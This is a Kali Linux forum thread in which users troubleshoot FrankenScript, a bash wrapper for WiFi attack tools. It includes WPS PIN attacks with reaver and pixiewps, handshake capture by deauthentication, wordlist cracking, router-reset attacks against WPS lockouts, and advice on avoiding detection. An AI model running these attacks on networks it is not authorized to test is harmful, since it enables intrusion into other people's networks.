slim76
2014-07-19, 04:04
@ Quest,

Try this:
1) Close FrankenScript using the [q] option, then close the terminal window.
2) Restart FrankenScript and select option [1] from the main menu, then choose option "[1] = airmon-ng check kill".
3) Choose any mac address option and then retry the "[1] = Full iw-dev Scan" again.

I've fixed the custom bully attack options, I've also added some more return to options and fixed an issue with the handshake capture attack.
I'll probably upload it within the next few days.

Quest
2014-07-19, 05:00
I would have answered you sooner but, I did exactly as above and as a result..


Scanned_APs
===========



############################################################################
# [f] = Re-Scan - Full iw-dev Scan      # [e] = Sort Scan By - ESSID       #
# [w] = Re-Scan - Wash WPS Network Scan # [a] = Sort Scan By - Encryption  #
# [d] = Re-Scan - Airodump Network Scan # [0] = Return To Main Menu        #
#                                       # [q] = Exit FrankenScript         #
############################################################################

Please choose an option or input the number of a target:



so it's the same as before, but option 1 ("[1] = airmon-ng check kill") has killed my network manager so I had to reboot my computer, thank you very much..

R&D.. :cool:

slim76
2014-07-19, 06:03
I would have answered you sooner but, I did exactly as above and as a result..



so it's the same as before, but option 1 ("[1] = airmon-ng check kill") has killed my network manager so I had to reboot my computer, thank you very much..

R&D.. :cool:

It was meant to kill network manager, and you didn't need to restart your computer. LOL
Network manager would have been restarted if you used the [q] option or if you re-enabled networking mode using option [6] from the main menu. LOL

What does R&D.. mean?.

London
2014-07-19, 13:31
Research and Development

Quest
2014-07-19, 14:49
a little more testing...



exiting with [q] does restart the network manager! That's what I did before with a different result!? Weird.




[1] = Full iw-dev Scan, still not working for me. But [2] = Wash WPS Network Scan. and [3] = Airodump Network Scan. both work.

# [f] = Re-Scan - Full iw-dev Scan, does not scan, but only shows previously scanned Airodump networks.




something strange happens when i use FS2, and surf (even after FS2 is closed with q). I cannot connect to web sites, even if the network manager shows that I'm still connected, or sometimes it kills wlan0, and I have to shut down/restart network manager for my wifi adapter (wlan0) to be visible again. I never use the same wifi adapter to surf and pen test. I always separate things. So wlan0 is connected on the web and wlan1 is testing. It happens when I start FS2. It happens every time.






Handshakes


Checking for a captured handshake in 5 seconds...
ERROR: could not insert 'nvidia': No such device
Pyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+

Parsing file '/root/FrankenScript2/Temp_Working_Dirctory/psk-01.cap' (1/1)...
Parsed 37 packets (37 802.11-packets), got 2 AP(s)

#1: AccessPoint a4:...



New pcap-file '/root/FrankenScript2/Temp_Working_Dirctory/Stripped.cap' written (22 out of 37 packets)
ERROR: could not insert 'nvidia': No such device

Valid handshake detected, XXXXX.cap will be coppied to FrankenScript2/Captured_Handshakes

Press [Enter] to continue.





[3] Attack Handshake Files

does not show me the .cap file captured above, and it is there in /root/FrankenScript2/Captured_Handshakes





Please input the number of your chosen capture file:
./FrankenScript2.sh: line 2381: /root/FrankenScript2/Temp_Working_Dirctory/Handshake_Cracking/Handshake_File.txt: No such file or directory
cat: /root/FrankenScript2/Temp_Working_Dirctory/Handshake_Cracking/Chosen_capture_file.txt: No such file or directory

Drag and drop the wordlist onto this screen:





Drag and drop the wordlist onto this screen: '/root/FrankenScript2/Captured_Handshakes/MARIA.cap'

NOTE: If the passkey is found there will be a long wait before the xterm windows close automatically.
Recovered passkeys will be stored in /root/FrankenScript2/Recovered-Passkeys.txt

Press [Enter] to continue.



Then 2 windows open saying the same thing, which I could not copy paste.

ERROR: could not insert 'nvidia': No such device

slim76
2014-07-21, 10:46
To fix the capture files not being displayed issue do the following:
Browse to root/FrankenScript/Temp_Working_Dirctory, then rename the folder inside the Temp_Working_Dirctory to Handshake_Cracking.

In regards to the iw dev scan issue and the browsing while using FrankenScript issue:

1) Network Manager and other processes can sometimes cause issues while using the aircrack tools, so these processes sometimes need to be killed before attempting an attack.

FrankenScript has kill processes options:
a) airmon-check-kill = Automatically kills all troublesome processes Network Manager included (So no browsing the internet while Attack Mode is enabled).
b) Proceed without killing any processes = Can cause issues while trying to perform some attacks.

Quest
2014-07-21, 17:48
Hi Slim,

I will try that.

You have a feedback in the Howto that I started https://forums.kali.org/showthread.php?22087-Howto-frankenScript&p=35619#post35619 from Defaultzero

I will start a Problems/Solutions collection in the first post, so you won't have to answer the same questions all the time.

RChadwick
2014-07-23, 06:23
I really like your script. However, I read somewhere this will reboot locked routers with MDK3. I can't find an option for that. Is it supported?

slim76
2014-07-24, 02:07
I really like your script. However, I read somewhere this will reboot locked routers with MDK3. I can't find an option for that. Is it supported?

It did have that feature but it doesn't anymore.

I'm not sure if you're pentesting your own private network or trying to gain access to someone else's network, or if it's work related but here's a little advice.
Don't try to reset any access points if stealth is an issue, using the access point reset attacks will seriously increase the chance of getting caught.

RChadwick
2014-07-24, 02:58
No, just Pen testing. Just curious, but why was that feature removed? Most routers I test nowadays can't be cracked without resetting the router.

slim76
2014-07-24, 10:42
No, just Pen testing. Just curious, but why was that feature removed? Most routers I test nowadays can't be cracked without resetting the router.

I'll probably add it to FrankenScript again at some point.

Quest
2014-07-24, 14:18
RChadwick, since FS has the option to start other scripts, you can add ReVdk3 in the 'scripts' folder.

https://forums.kali.org/showthread.php?19498-MDK3-Secret-Destruction-Mode


Atrophy is a basic program that uses MDK3 to attempt to reboot routers (helpful when trying to unlock WPS.) The program uses Authentication flood, Michael Integrity Check failure, beacon flood, and deauthentication (a few others too depending on your configuration.)

ReVdk3 is a similar program to Atrophy, but it uses a different approach to attack an access point. It uses EAPOL start and stop attacks to attempt to reboot the router.

Frankenscript 2 is a full blown program that offers a wide range of tools to attack access points. You can find more info here. (https://forums.kali.org/showthread.php?19913-FrankenScript-by-Slim76-It-Attacks-Access-Points-and-pcap-files)

I have no idea how it works though.

Quest
2014-07-24, 16:28
for the empty Temp_Working_Dirctory folder problem...

Differences between versions upon exiting:

FrankenScript2-10-06-2014.tar.gz

[ ok ] Starting network connection manager: NetworkManager already started.

Cleaned Temp Folder
root@kali:~/FrankenScript2#


FrankenScript2_Updated-19-7-2014.tar.gz

[ ok ] Starting network connection manager: NetworkManager already started.
root@kali:~/FrankenScript2#

jar
2014-11-10, 02:14
Hi slim76 and Quest;

First thanks for the .deb and the hardwork. I am new and learning cracking as a hobby.

I managed to obtain a valid WPA handshake from my home router, however I am unable to crack it using:

# [2] = Attack using hashcat
# [3] = Attack using oclhashcat
# [4] = Attack using cudahashcat

I keep getting the following errors when trying to crack it.

Please input the number of your chosen capture file: 1
cp: cannot overwrite non-directory `/usr/share/FS3/Temp_Working_Dirctory/Handshake_Cracking' with directory `/usr/share/FS3/Captured_Handshakes/FIBREOP879'
cp: cannot stat `/usr/share/FS3/Temp_Working_Dirctory/Handshake_Cracking/FIBREOP879/AP_Name.txt': Not a directory
cat: /usr/share/FS3/Temp_Working_Dirctory/Handshake_Cracking/AP_Name.txt: Not a directory
cp: accessing `/usr/share/FS3/Temp_Working_Dirctory/Handshake_Cracking/': Not a directory
/usr/share/FS3/Scripts/Attack_Capture_Files.sh: line 45: /usr/share/FS3/Temp_Working_Dirctory/Handshake_Cracking//Capture_File.txt: Not a directory
cat: /usr/share/FS3/Temp_Working_Dirctory/Handshake_Cracking/AP_Name.txt: Not a directory
cat: /usr/share/FS3/Temp_Working_Dirctory/Handshake_Cracking//Capture_File.txt: Not a directory
cat: /usr/share/FS3/Temp_Working_Dirctory/Handshake_Cracking//essid.txt: Not a directory
cat: /usr/share/FS3/Temp_Working_Dirctory/Handshake_Cracking//bssid.txt: Not a directory
/usr/share/FS3/Scripts/Attack_Capture_Files.sh: line 151: Edit: command not found
grep: /usr/share/FS3/Temp_Working_Dirctory/Handshake_Cracking//Wordlist_Attack.txt: Not a directory

I installed the latest version and read the entire thread to configure it properly, however I cannot crack the capture.

Any ideas?

Thanks in advance.

Quest
2014-11-10, 11:30
Hi jar!

You got me completely mystified... What do you mean by

# [2] = Attack using hashcat
# [3] = Attack using oclhashcat
# [4] = Attack using cudahashcat
:confused:

ocl/cuda/Hashcat are not in FS yet. Are you a time traveler?

Posting in an old thread about something that will happen in the future? Am i slowly losing my mind here?

jar
2014-11-10, 13:30
Hi Quest,

I am using fs3.sh/.deb from post #1 from slim76. When I choose the option to Attack Handshake Capture Files, I am presented with the above options and I attached an image. I just searched the code and there is no reference to ocl/cuda/Hashcat. So it's merely options that will be implemented in the future, hence why I am getting the errors.

Is there a newer post/site regarding fs3?

Thanks again,

jar


Quest
2014-11-12, 12:05
lol, i see these options now...

You got FS3 from the new thread https://forums.kali.org/showthread.php?22087-Howto-frankenScript

Then this thread was unlocked and moved here from "Kali Linux General Use" forum.

Then you posted in this thread about ghost options that I had no idea about.

:eek:

slim76
2014-11-12, 12:42
Hi slim76 and Quest;

First thanks for the .deb and the hardwork. I am new and learning cracking as a hobby.

I managed to obtain a valid WPA handshake from my home router, however I am unable to crack it using:

# [2] = Attack using hashcat
# [3] = Attack using oclhashcat
# [4] = Attack using cudahashcat

I keep getting the following errors when trying to crack it.

Please input the number of your chosen capture file: 1
cp: cannot overwrite non-directory `/usr/share/FS3/Temp_Working_Dirctory/Handshake_Cracking' with directory `/usr/share/FS3/Captured_Handshakes/FIBREOP879'
cp: cannot stat `/usr/share/FS3/Temp_Working_Dirctory/Handshake_Cracking/FIBREOP879/AP_Name.txt': Not a directory
cat: /usr/share/FS3/Temp_Working_Dirctory/Handshake_Cracking/AP_Name.txt: Not a directory
cp: accessing `/usr/share/FS3/Temp_Working_Dirctory/Handshake_Cracking/': Not a directory
/usr/share/FS3/Scripts/Attack_Capture_Files.sh: line 45: /usr/share/FS3/Temp_Working_Dirctory/Handshake_Cracking//Capture_File.txt: Not a directory
cat: /usr/share/FS3/Temp_Working_Dirctory/Handshake_Cracking/AP_Name.txt: Not a directory
cat: /usr/share/FS3/Temp_Working_Dirctory/Handshake_Cracking//Capture_File.txt: Not a directory
cat: /usr/share/FS3/Temp_Working_Dirctory/Handshake_Cracking//essid.txt: Not a directory
cat: /usr/share/FS3/Temp_Working_Dirctory/Handshake_Cracking//bssid.txt: Not a directory
/usr/share/FS3/Scripts/Attack_Capture_Files.sh: line 151: Edit: command not found
grep: /usr/share/FS3/Temp_Working_Dirctory/Handshake_Cracking//Wordlist_Attack.txt: Not a directory

I installed the latest version and read the entire thread to configure it properly, however I cannot crack the capture.

Any ideas?

Thanks in advance.

Sorry but those options don't work yet, I only put them there because staticn0de said he would write the attacks for those options.
I think I might have to write the attacks by myself, but my Nvidia card has just died and I don't know when I'll be getting another cuda supported card. :-(

slim76
2014-11-12, 12:47
If there's anyone from north London that has any spare cuda supported cards that they don't want it would be most helpful. LOL

Quest
2014-11-12, 12:48
I think staticn0de is busy.

Yes, I thought your rig face planted! My Jedi skills are improving

That sucks.

slim76
2014-11-12, 12:53
I think staticn0de is busy.

Yes, I thought your rig face planted! My Jedi skills are improving

That sucks.

I knew the card had problems before I set it up, it did work intermittently for a while but now it has died completely. lol

Quest
2014-11-12, 12:59
used video cards are easy to get. Most gamers have 2 or 3

Check your local ads/web market.

Actually if you can play it by ear, I can test.

slim76
2014-11-12, 13:12
used video cards are easy to get. Most gamers have 2 or 3

Check your local ads/web market.

Actually if you can play it by ear, I can test.

I think you doing the testing for me might be the only option.
I can't really afford to buy another card at the moment as I have health issues and I'm not currently working, plus it's nearly Christmas and I need every penny I can get. :-(

Quest
2014-11-12, 13:43
yes and jar can test also for cuda/Hashcat, since he's one step ahead of me to find special options ;)

We need a volunteer that has ATi/stream to test ocl/Hashcat though.

For your health issues, I've been listening to independent researchers for years. I might have a trick or two for ya ...

slim76
2014-11-12, 14:35
yes and jar can test also for cuda/Hashcat, since he's one step ahead of me to find special options ;)

We need a volunteer that has ATi/stream to test ocl/Hashcat though.

For your health issues, I've been listening to independent researchers for years. I might have a trick or two for ya ...

Let me get cuda/Hashcat sorted first lol, then I'll move on to ocl/Hashcat.

I'm still alive so my health issues are not that bad anymore lol, anyway let's keep to the topic or we might cause problems with the thread ;-).
Cheers anyway matey.

slim76
2015-04-26, 03:50
Here's the latest FrankenScript.

FrankenScript_Portable.26.April.2015.tar.gz
https://www.mirrorcreator.com/files/1W7QPQQW/FrankenScript_Portable.26.April.2015.tar.gz_links

nuroo
2015-04-26, 16:58
Had trouble downloading it. The first biggest link lead to FrankenScript_Portable.26.April.2015.tar.gz.exe.
Kali tried to load wine when I double clicked it.
I should have known I'm looking for a *.sh file

Anyway finally found a link to FrankenScript_Portable.26.April.2015.tar.gz, that worked. Nice touch to add the necessary programs with the download. Well implemented script. Luv the layout and approach.
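Two packaging problems reported in this thread can be checked before extracting anything: the repack that lost the execute bit and unpacked as loose files, and the mirror link that served a `.tar.gz.exe` instead of the archive. The script below is an added example, not part of FrankenScript or of any post here; the function names and the sample archives it builds are constructed for illustration.

```shell
#!/bin/sh
# Added example: pre-extraction checks for a downloaded .tar.gz.
# All function names and sample archives are constructed for illustration.

# True if the file starts with the gzip magic bytes 1f 8b and tar can list it.
is_gzip_tar() {
    magic=$(od -An -tx1 -N2 "$1" 2>/dev/null | tr -d ' \n')
    [ "$magic" = "1f8b" ] && tar -tzf "$1" >/dev/null 2>&1
}

# Reads member names on stdin; true if any is absolute or has a ".." component.
has_unsafe_paths() {
    grep -Eq '^/|(^|/)\.\.(/|$)'
}

# Prints how many distinct top-level names the archive contains.
# More than one means it will scatter files into the current directory.
top_level_count() {
    tar -tzf "$1" | sed 's|^\./||' |
        awk -F/ 'NF && $1 != "" {print $1}' | sort -u | wc -l | tr -d ' '
}

# Prints regular *.sh members whose owner execute bit is not set.
# Names containing spaces are not handled (last field of the listing is used).
nonexec_scripts() {
    tar -tvzf "$1" | awk '$1 ~ /^-/ && $1 !~ /^-..x/ && $NF ~ /\.sh$/ {print $NF}'
}

# Returns 0 = OK, 1 = reject, 2 = loose files, 3 = scripts need chmod +x.
check_archive() {
    if ! is_gzip_tar "$1"; then
        echo "REJECT: not a gzip-compressed tar archive"; return 1
    fi
    if tar -tzf "$1" 2>/dev/null | has_unsafe_paths; then
        echo "REJECT: absolute or parent-directory member paths"; return 1
    fi
    n=$(top_level_count "$1")
    if [ "$n" -ne 1 ]; then
        echo "WARN: $n top-level entries, extract into an empty directory"; return 2
    fi
    missing=$(nonexec_scripts "$1")
    if [ -n "$missing" ]; then
        echo "WARN: scripts without execute bit: $missing"; return 3
    fi
    echo "OK"; return 0
}

# Builds four constructed samples in directory $1.
make_samples() {
    d=$1
    mkdir -p "$d/good/FrankenScript2" "$d/noexec/FrankenScript2" "$d/loose"
    printf '#!/bin/sh\necho ok\n' > "$d/good/FrankenScript2/FrankenScript2.sh"
    cp "$d/good/FrankenScript2/FrankenScript2.sh" "$d/noexec/FrankenScript2/"
    cp "$d/good/FrankenScript2/FrankenScript2.sh" "$d/loose/"
    echo notes > "$d/loose/README.txt"
    chmod 0755 "$d/good/FrankenScript2/FrankenScript2.sh" "$d/loose/FrankenScript2.sh"
    chmod 0644 "$d/noexec/FrankenScript2/FrankenScript2.sh"
    tar -czf "$d/good.tar.gz"   -C "$d/good"   FrankenScript2
    tar -czf "$d/noexec.tar.gz" -C "$d/noexec" FrankenScript2
    tar -czf "$d/loose.tar.gz"  -C "$d/loose"  FrankenScript2.sh README.txt
    printf 'MZ this is not an archive' > "$d/fake.tar.gz"   # stand-in for a renamed .exe
}

demo() {
    tmp=$(mktemp -d)
    make_samples "$tmp"
    for f in good noexec loose fake; do
        printf '%-14s ' "$f.tar.gz"
        check_archive "$tmp/$f.tar.gz" || true
    done
    rm -rf "$tmp"
}
demo
```
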

nuroo
2015-04-26, 17:26
I may be doing something wrong. This is what happened:


MAC address for wlan2:
Permanent MAC: xxxxxxxxxx (xxxxxxxxx, xxxxx.)
Current MAC: xxxxxxxxx:c5:fc:f9 (unknown)

MAC address for mon0:
Permanent MAC: xxxxxxxxxx (xxxxxxxxx, xxxxx.)
Current MAC: xxxxxxxxx:c5:fc:f9 (unknown)

Target Details: "HAR0000000" 00:00:00:7D:B6:D0

Possible WPS Pins: 82388003 57952154 82109011 65949474

[1] = Reaver.t6x + Pixiewps (Fixed Arguments)
[2] = Reaver + Pin Generators (Fixed Arguments)
[3] = Reaver (Fixed Arguments)
[4] = Reaver + Pin Generators (Custom Arguments)
[5] = Custom Attack
[p] = Proceed To Attack The Next Target

Please choose an option:

Picked 2

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

[+] Switching mon0 to channel 6
[+] Waiting for beacon from 00:00:00:7D:B6:D0
[+] Associated with 00:00:00:7D:B6:D0 (ESSID: We hear you 0000000000)
[+] Trying pin 82109011
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 77:58:36:c7:b0:f2:74:ee:23:21:f2:5e:a5:b1:b4:46
[P] PKE: 2f:5c:5b:e6:52:8d:63:09:e0:d3:20:0d:8f:e8:70:c5:a6 :06:25:d9:15:bc:2f:63:6c:11:29:f4:28:e6:7d:8d:e8:f 7:f0:d8:0a:96:f6:1e:ea:fd:b1:7b:05:a2:ff:eb:e7:5d: cd:05:c1:5d:5c:0f:2c:86:1b:76:d0:97:9d:f1:b2:bc:30 :49:05:bb:77:8c:ff:d1:89:5b:3f:9c:71:a1:40:1b:7a:9 a:69:87:fc:34:5a:9f:2c:48:9f:97:f3:e4:8c:c2:91:9f: a9:c5:3d:75:8a:28:ab:a4:51:76:6d:a3:e7:33:bc:8f:2e :9b:30:64:fe:9c:e1:e0:d8:f4:ac:48:88:e7:34:e7:87:f 7:8d:ca:b6:18:b1:28:8e:20:8a:d7:77:9d:4b:05:e7:29: e4:06:0c:b8:81:af:8a:cc:11:be:72:be:ba:ee:1a:f5:58 :eb:d4:ee:5b:52:e4:9a:7e:91:ce:7f:49:2f:46:9e:c3:8 6:bf:5c:75:34:1a:1b:74:f9
[P] WPS Manufacturer: Cisco
[P] WPS Model Number: 123456
[+] Received M1 message
[P] AuthKey: 9c:fa:0e:5c:e6:81:9f:8c:16:22:da:d9:38:4c:b1:8a:cd :62:b6:39:c7:5f:6f:dd:70:56:38:bd:99:dc:38:9d
[+] Sending M2 message
[P] E-Hash1: 1e:6d:d4:e6:57:03:57:05:a0:7a:73:7c:14:21:91:ea:a1 :94:7f:d1:81:12:7e:3c:6e:cc:6f:4f:c7:a1:aa:56
[P] E-Hash2: 16:90:6b:e9:8b:ca:d8:c6:83:f1:34:fe:92:46:84:1b:35 :c4:08:bb:39:a4:21:2c:c0:c5:1d:b2:97:9a:03:3c
[+] Received M3 message

Script (reaver) displays different essid when attacking target on the (attack screen)........
Threw me off for a sec.

slim76
2015-04-26, 17:59
@ nuroo

I'm not sure what the problem is at the moment, but i'll look into it asap.
Is "[2] = Reaver + Pin Generators (Fixed Arguments)" the only one that has that problem?, or does the essid change on other attack options too?.

nuroo
2015-04-26, 19:07
I'll check and report back, that was the first attacks i've tried. Already attacked the easy targets. Looking to your script to go after hard targets that are wps locked and have rate limiting and such.

slim76
2015-04-26, 19:56
Ok kool, you can use the custom wps attack option if you want to use advanced arguments.
I won't be adding any mdk3 router reset options as I think it causes too many problems.

slim76
2015-04-27, 02:03
@ nuroo

I looked through FrankenScript and tested it several times but couldn't reproduce the issue you had, I'm guessing it might be a reaver problem or maybe a problem with your kali installation.

@ everyone

Has anyone else had the same issue as nuroo?.
Has anyone used the same settings as nuroo but didn't have an issue?.

Please leave some feedback. :-)

nuroo
2015-04-27, 03:15
I'll try on another computer, different usb wifi card. I am a noob, it's entirely possible it's my error.

Quest
2015-04-27, 17:27
Hey! I've been giving it a spin and here are some observations..

1. overall I think it's a great FS release. Packaging is good and the new 'portable' installation is great! Download was horrific, though it IS FrankenScript after all. lol

2. you are killing me with these confirmations..

Multiple wlan devices were detected:

1: wlan0 Intel 2230 iwlwifi - [phy0]
2: wlan1 Atheros AR9271 ath9k - [phy1]

Input the number of the device you want to use: 2

You've chosen to use wlan1, is this correct? y/n:

One monitor mode interface was detected:

1: mon0 Atheros AR9271 ath9k - [phy1]

[1-99] = Selects An Interface
[c] = Creates A New Monitor Interface
Input your choice: 1

You've chosen to use mon0, is this correct? y/n:
we are not launching a rocket into space here Slim. Just doin network vulnerability assessments ;)

3. I did not notice what nuroo has reported, though I had some weird stuff happened on a certain AP..

############################## Scan Results ##############################

1: WPS Locked ESSID BSSID RSSI Version Channel
2: TelecenXXX-XXXX ---------------------------------------------------------------------------------------------------------------
3: ValenXXXX XX:XX:XX:XX:XX:XX 00.dBm WPS-Locked-Yes Channel-2
4: MARTXX_Network XX:XX:XX:XX:XX:XX 00.dBm WPS-Locked-No Channel-6
5: SkynetCisXXXX XX:XX:XX:XX:XX:XX 00.dBm WPS-Locked-No Channel-9


##########################################################################
# [1-99] = Select A Target      # [i] = iw dev scan (WPS WPA/WPA2 WEP)   #
# [p] = Proceed To Attacks      # [w] = wash scan (WPS)                  #
# [d] = Delete A Target         # [a] = airodump-ng scan (WPA/WPA2 WEP)  #
# [m] = Return To The Main Menu #                                        #
##########################################################################

Please choose an option:

4. Where is Bully??


[1] = Reaver.t6x + Pixiewps (Fixed Arguments)
[2] = Reaver + Pin Generators (Fixed Arguments)
[3] = Reaver (Fixed Arguments)
[4] = Reaver + Pin Generators (Custom Arguments)
[5] = Custom Attack
[p] = Proceed To Attack The Next Target

Please choose an option:


5. 2 and 5 are the same.


Reaver Versions.
################

1: reaver.fork.rev8.64bit
2: reaver.kali.installed.64bit
3: reaver.t6x.rev51.64bit
4: reaver.v1.3.64bit
5: reaver.v1.4.64bit

Please choose a version of reaver to use:



6. why is the -p argument there by default?


Attack Arguments:
reaver.fork.rev8.64bit -i mon0 -c 2 -b XX:XX:XX:XX:XX:XX <CustomArgumentsHere> -p -vv

Please input reaver arguments: -vv



Chosen Attack Arguments:
reaver.fork.rev8.64bit -i mon0 -c 2 -b XX:XX:XX:XX:XX:XX -vv -p

Are the chosen arguments correct? y/n:

slim76
2015-04-27, 22:09
Hey! I've been giving it a spin and here are some observations..

1. overall I think it's a great FS release. Packaging is good and the new 'portable' installation is great! Download was horrific, though it IS FrankenScript after all. lol

2. you are killing me with these confirmations..


we are not launching a rocket into space here Slim. Just doin network vulnerability assessments ;)

3. I did not notice what nuroo has reported, though I had some weird stuff happened on a certain AP..


4. Where is Bully??



5. 2 and 5 are the same.



6. why is the -p argument there by default?

1) All the adverts and that stupid .exe **** is nothing to do with me or FrankenScript, most people know FrankenScript is a bash script and not an exe file. LOL

2) C'mon man you only have to confirm them once, don't keep going back to the main menu and you won't have to confirm them anymore. LOL
I like it that way cause I use multiple wifi adapters and I often keep choosing the wrong one.

3) Are you saying some of the access point details were missing?.

4) I left Bully out cause it only worked for me once, I might add it again at some point.

5) Hasn't the kali version of reaver been modified?, reaver.v1.4 is unmodified.

6) It's there cause it's a fixed argument attack, it's meant to help to avoid lockouts or something like that.
If the -P argument is an issue for you, you can use the custom options, that's why the custom option is there. LOL

Quest
2015-04-27, 22:30
1) still an horrific and traumatizing experience. I'm still shaken.

2) I like it that way cause I use multiple wifi adapters and I often keep choosing the wrong one.
Well, not exactly our problem is it? We (consumers) demand that you (monster creator) take the **** thing out! It's redundant for us Professionals that can actually select the right dongle the first time. Petition pending.

3) just on this access point, there was no info what so ever, and when choosing that particular AP, FS went right back to the Scan Results. Don't take any actions though, that's a very strange AP. Just thought I'd report it anyway.

4) Bring it back asap. Bully is a very nice alternative. No reason to can it.

5) hmm don't know. Anyways it is not causing any prbs, and if they ever change the reaver version from 1.4 to something else, then we'll still have 1.4 separately, so leave it like that. I didn't say anything.

6) oki, but I think the user can type -p Just saying.

Anyways luv that version! :D

slim76
2015-04-28, 06:36
1) still an horrific and traumatizing experience. I'm still shaken.

2) I like it that way cause I use multiple wifi adapters and I often keep choosing the wrong one.
Well, not exactly our problem is it? We (consumers) demand that you (monster creator) take the **** thing out! It's redundant for us Professionals that can actually select the right dongle the first time. Petition pending.

3) just on this access point, there was no info what so ever, and when choosing that particular AP, FS went right back to the Scan Results. Don't take any actions though, that's a very strange AP. Just thought I'd report it anyway.

4) Bring it back asap. Bully is a very nice alternative. No reason to can it.

5) hmm don't know. Anyways it is not causing any prbs, and if they ever change the reaver version from 1.4 to something else, then we'll still have 1.4 separately, so leave it like that. I didn't say anything.

6) oki, but I think the user can type -p Just saying.

Anyways luv that version! :D

Ok I'll take out the confirmation options for the interfaces selection, and I'll try and add Bully again at some point.
The whole point of the fixed options is to avoid typing and remembering commands, if you can remember the commands and you want to use different commands then the custom option might be better suited to your needs.

I think the issue regarding the missing access point details is due to the wash scan.
Does the issue happen all the time?.
Does it only happen on the first line?.

Quest
2015-04-28, 10:57
2) I was thinking that maybe a simple 'go back' option might solve it for all...


Multiple wlan devices were detected:

1: wlan0 Intel 2230 iwlwifi - [phy0]
2: wlan1 Atheros AR9271 ath9k - [phy1]



One monitor mode interface was detected:

1: mon0 Atheros AR9271 ath9k - [phy1]
2: go back

3)
Does the issue happen all the time?. Yes
Does it only happen on the first line?. No


7. not too crazy about the new handshake routine. It was better before, where I could choose the number of Deauth packets. Plus now I don't see what is going on when I start the Deauth process.


Deauthentication Options:

[1] = Deauthenticate All Connected Clients
[2] = Deauthenticate A Specific Client
[3] = Procced To Attack The Next Target

Please choose an option:
then..
Validate Handshake Options:

[1] = Cowpatty Handshake Validation
[2] = Pyrit Handshake Validation
[3] = Proceed Without Validating

Please choose an option:


but no results are shown.

It was better before, at least I could tell what was the problem. Now is it because of a bad handshake or no handshake at all ?? No clue.



Thanks for implementing [Ctrl]+[c]. Things are faster now and operations alot more instinctive. Cheers!

Quest
2015-04-28, 11:18
8. I tried [1] = Reaver.t6x + Pixiewps (Fixed Arguments) and I won't go into details as I never had much luck with that new attack, but reaver goes into a endless loop with no way of terminating that process. When I [Ctrl]+[c] it, reaver starts all over again. I have to shut down that window to end it, and restart FS.

For the rest of the Pixiewps functionality, I will leave it to someone that actually knows about it to give you feedback ;)

slim76
2015-04-28, 13:02
8. I tried [1] = Reaver.t6x + Pixiewps (Fixed Arguments) and I won't go into details as I never had much luck with that new attack, but reaver goes into a endless loop with no way of terminating that process. When I [Ctrl]+[c] it, reaver starts all over again. I have to shut down that window to end it, and restart FS.

For the rest of the Pixiewps functionality, I will leave it to someone that actually knows about it to give you feedback ;)

That's what's meant to happen.
Reaver is meant to loop through all the pixie arguments until it has either got the pin or until all the pixie arguments have been tried, it should then return back to the wps attack menu.
I've already added options to quit the attack in the next version.

Regarding the handshake.
You should see in the airodump-ng window if you've captured a handshake or not, and you should only get the Validate Handshake Options if you've captured a handshake.
If you don't get a handshake you'll be taken back to the deauth option menu.

This is what you should see if you get a handshake:

"Validate Handshake Options:

[1] = Cowpatty Handshake Validation
[2] = Pyrit Handshake Validation
[3] = Proceed Without Validating

Please choose an option: "

If you validate the handshake and its good you'll be presented with something like:

"Handshake capture file will be coppied to Directory/Captures/AP-Name

Press [Enter] to continue."

If the handshake is bad you'll be taken back to the deauth option menu.

Regarding the missing access point details.
I think the problem might be something to do with how I split and merged the scan results, I think I might have to rewrite the wash scan function AGAIN.

Quest
2015-04-28, 13:32
ok, but I really liked the handshake routine in the previous version. I don't think that automating things to the point of not having Deauth packets option is the way to go. Let FS do most of the work, but let the user some room to try different things. 'Artificial intelligence' and automated functions are very tricky. As an example, just use MS Word with its auto-correct functions, and that thing is dumb as a stick and counter productive.

I would focus on the basic premise of FS "saving the user time" and "reducing user input errors", rather than automating attacks. They seem to be one and the same thing, but there is a big difference between both philosophies. One eliminates redundant tasks and human error, the other limits choices and may lead to failure. Big difference between the two.

Let me know if you want me to test anything, except the Pixiewps attack, which I don't understand, even when automated :p

Quest
2015-04-28, 16:57
I may be doing something wrong. This is what happened:

Script (reaver) displays different essid when attacking target on the (attack screen)........
Threw me off for a sec.

(reaver) displays different essid: Confirmed



@ nuroo

I'm not sure what the problem is at the moment, but I'll look into it asap.
Is "[2] = Reaver + Pin Generators (Fixed Arguments)" the only one that has that problem?, or does the essid change on other attack options too?.

No, I picked the first option, Pixiewps.




7: navar 64:66:B3:XX:XX:XX 00.dBm WPS-Locked-No Channel-6
8: Luis 20:AA:4B:XX:XX:XX 00.dBm WPS-Locked-No Channel-11<----my target.



Reaver.t6x + Pixiewps Fixed Attack Arguments:
reaver.t6x.rev51.64bit -i mon0 -c 11 -b 20:AA:4B:XX:XX:XX -a -P -K 1 -vv

Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead & Soxrok2212

[+] Switching mon0 to channel 11
[+] Waiting for beacon from 20:AA:4B:XX:XX:XX
[+] Associated with 20:AA:4B:XX:XX:XX (ESSID: navar)<---wrong essid!!
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START req

nuroo
2015-04-28, 17:03
last thing I wanna do is give erroneous errors 4 u to chase, glad someone else confirmed this.

Quest
2015-04-28, 17:10
and thank you for picking up the slack! I might never have seen it. Too weird of a bug to be easily noticeable. Thanks!!

ps: if you have time nuroo, to test the Pixiewps option. I'm clueless about that attack and wouldn't know if it works or not. So if you had success with the original Pixie attack on a certain AP, could you test FrankenScript on that same AP to confirm that the Pixiewps option works?

nuroo
2015-04-28, 17:28
It would be my honor and pleasure. I'll do it tonight.

Quest
2015-04-28, 17:55
ok thx! Just wait for further word from the monster maker in case he wants you to test a new FS version. Don't want you to waste your time with a faulty version. Cheers!

@ Slim,

yep, the results are completely out of whack. Not just the essid.

Scan 1:

6: Luis C0:4A:00:XX:XX:XX 00.dBm WPS-Locked-No Channel-11

Scan2:

